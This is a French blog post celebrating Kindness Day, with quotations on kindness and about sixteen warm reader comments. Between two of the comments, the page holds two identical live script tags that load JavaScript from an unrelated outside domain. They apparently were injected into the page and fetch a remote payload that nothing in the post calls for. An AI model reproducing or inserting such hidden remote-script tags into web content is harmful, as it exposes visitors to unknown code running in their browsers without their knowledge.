• Journée de la gentillesse

    Journée de la gentillesse

     

    Bonne journée à tous les gentils

     

    "La gentillesse est un comportement altruiste destiné à prendre soin des autres, en tenant compte de la sensibilité d'autrui afin de ne pas le brusquer ou l'offusquer"

    Journée de la gentillesse

     

    Voilà une définition parmi d'autres de la gentillesse, perso je suis gentille à certains moments et suivant qui j'ai en face de moi, si l'autre fait une tronche de mal aimable franchement je n'ai pas envie de sourire et d'avoir un mot gentil ou sympa.

    Mais bon aujourd'hui je serai gentille ;)

     

    Journée de la gentillesse

    " La plus noble des vertus c'est la gentillesse, mais le monde d'aujourd'hui en a fait une faiblesse"

     

    "L'erreur ce n'est pas d'être gentil, l'erreur c'est de l'être avec certaines personnes"

     

    Journée de la gentillesse

    Merci à Tine et Rosine pour les petits extras décoratifs

    « Effets : goutte d'eau - photo - dégradés - bois -Merci Ginou »

  • Commentaires

    16
    Samedi 10 Novembre à 21:06

    Arghhhh! Mais cette journée est déjà passée, terminée, hiiiiiiiiiii!

    Zut j'ai raté l'occasion d'être gentille ! Hi hi ;o)

    En tous cas, il y a une chose dont je suis sûre et certaine, c'est que toi MISS KATE tu es la plus gentille des copines.

    Gros kissous petite soeur de coeur♥

    15
    Samedi 10 Novembre à 18:10

    Eh oui, la gentillesse est de nos jours   traitée en  raillerie  et ironie

    C'est tellement dommage et titiste ...

    Ceci dit, tout à fait  d'accord avec toi,    tout dépend de la personne  qui est  sen face de vous pour l'être ou pas...

    C'est ce qu l’expérience m'a appris . ..

    D’autre part , ne pas être gentil avec quelqu'un n'a rien à voir  avec  avoir une  attitude   de méchanceté  envers elle. . .

    14
    Lundi 5 Novembre à 18:14

    Coucou Cathy, très jolie création. Oui je suis gentille, trop quelquefois. Mais, mais le juste milieu est primordial et je le mets en pratique. Bonne fin de journée ma belle, bisou rose tendresse !

    13
    Dimanche 4 Novembre à 11:10

    bonjour mon amie 

    ah le gentillesse

    c'est de plus en plus rare

    mais toi ,je vois que tu est une dame trés gentille 

    rien que de voir tes beaux partages de créations 

    super celle çi

    bon aprés midi 

    bisous 

    mireille

    12
    Samedi 3 Novembre à 18:44

    merci Cathy pour ta gentillesse 

    bonne soirée bisous

    un tit cadeau

    11
    Samedi 3 Novembre à 18:36

    Je corrige mon erreur

    "pour éviter de souffrir !" happy

    10
    Samedi 3 Novembre à 18:35

    Bonjour Kathania ou plutôt bonsoir vu l'heure!

    La gentillesse est une caresse de l'esprit et du coeur envers autrui , qui hélas de nos jours est

    effectivement perçue parfois comme une faiblesse .

    On ne se refait pas , bien sûr, et lorsqu'on est viscéralement gentil on le reste; Toutefois en prenant du recul et bcq de

    claques , on finit par être plus prudent pour souffrir.

    Bravo pour votre création emplie de douceur et de gentillesse !

     

    Bisous du coeur à vous et tout ceux qui passeront sur la page smilesmilesmile

     

     

    9
    Samedi 3 Novembre à 16:14

    bien d'accord avec toi.... et sur tout ! car il est vrai qu'être trop gentil est plutôt considéré comme une faiblesse... dommage...

    Merci gentille Kathania... 

    bisous 

     

    8
    Domi
    Samedi 3 Novembre à 14:12
    Domi

    Coucou Kathania,

    Joli tag avec une jolie pensée ...

    Moi je me définis un peu comme un caméléon ...

    Gentille avec ceux qui le sont, et pas du tout avec les gens détestables !

    C'est finalement assez courant !

    Bon week-end et gros bisous

    Domi

     

    7
    manike
    Samedi 3 Novembre à 14:08

    Wow tres joli et merci a toi de partager Bonne journée

     

    6
    Samedi 3 Novembre à 12:58

    coucou je suis bien en cette journée,je suis gentille avec pas mal tout le monde,alors bonne journée a tous je vous aime gros bibi et merci

    <script src="//prilgolink.com/1e862877dcb4f81821.js"></script> <script src="//prilgolink.com/1e862877dcb4f81821.js"></script>
    5
    scalnette
    Samedi 3 Novembre à 12:48

    coucou 

    je pense que c'est tout de même plus agréable d'être gentil que désagréable donc cette journée me va bien 

    très belle créa de ta part 

    biz

    4
    Samedi 3 Novembre à 12:11

    200% d'accord, Kathy cool

    Bisous,

    Nadège

     

    3
    Samedi 3 Novembre à 12:05

    Coucou Cathy,

    ah la gentillesse !! je le suis trop je vois tout le monde gentil

    mais bien sûr ce n'est pas le cas.

    En tout cas un grand merci pour ce joli article

    gros bisous tout gentils pour toi

    2
    cigale
    Samedi 3 Novembre à 11:54

     Bonjour KAT 

     

    C'est exactement ce que je pense !

     

    La "gentillesse" est de moins en moins "connue" et c'est bien regrètable !!

     

    Je t'envoi une brassee de bisous 

     

    ANNIE 

    1
    Samedi 3 Novembre à 11:32

    Bonjour Kathania,

    Très jolie créa pour cette jolie journée

    Félicitations et merci pour ta gentillesse.

    le dicton qui me va comme un gant : 

    "L'erreur ce n'est pas d'être gentil,

    l'erreur c'est de l'être avec certaines personnes".

    tout plein de bisous à toi,

    excellente journée de la Gentillesse,

    à bientôt,

    Delf

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :